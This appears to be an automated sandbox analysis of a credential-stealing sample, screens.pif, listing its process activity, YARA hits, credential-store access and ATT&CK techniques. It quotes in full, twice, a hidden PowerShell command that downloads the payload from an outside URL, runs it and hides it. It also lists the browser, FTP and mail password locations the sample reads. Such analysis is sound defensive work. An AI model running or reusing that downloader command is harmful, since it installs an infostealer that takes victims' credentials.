                Source: C:\Users\user\Desktop\screens.pifMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_7360.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7360, type: MEMORYSTR
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';
                Source: C:\Users\user\Desktop\screens.pifMemory written: C:\Users\user\Desktop\screens.pif base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Desktop\screens.pif "C:\Users\user\Desktop\screens.pif" Jump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pifJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pifJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pifJump to behavior
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -hidden -command ddisplay.dll;(new-object system.net.webclient).downloadfile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbafrawyegfyaugeygywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').attributes += 'hidden';
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\screens.pifQueries volume information: C:\Users\user\Desktop\screens.pif VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\screens.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\screens.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\screens.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\screens.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: screens.pif PID: 2208, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: screens.pif PID: 688, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000005.00000002.2659632439.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\screens.pifKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\Desktop\screens.pifKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Users\user\Desktop\screens.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\screens.pifFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\screens.pifFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\Desktop\screens.pifFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\Desktop\screens.pifFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\screens.pifKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\screens.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Users\user\Desktop\screens.pifCode function: PopPassword5_2_0040D069
                Source: C:\Users\user\Desktop\screens.pifCode function: SmtpPassword5_2_0040D069
                Source: Yara matchFile source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts1
                Command and Scripting Interpreter
                1
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts3
                PowerShell
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                1
                Deobfuscate/Decode Files or Information
                2
                Credentials in Registry
                13
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)111
                Process Injection
                3
                Obfuscated Files or Information
                Security Account Manager121
                Security Software Discovery
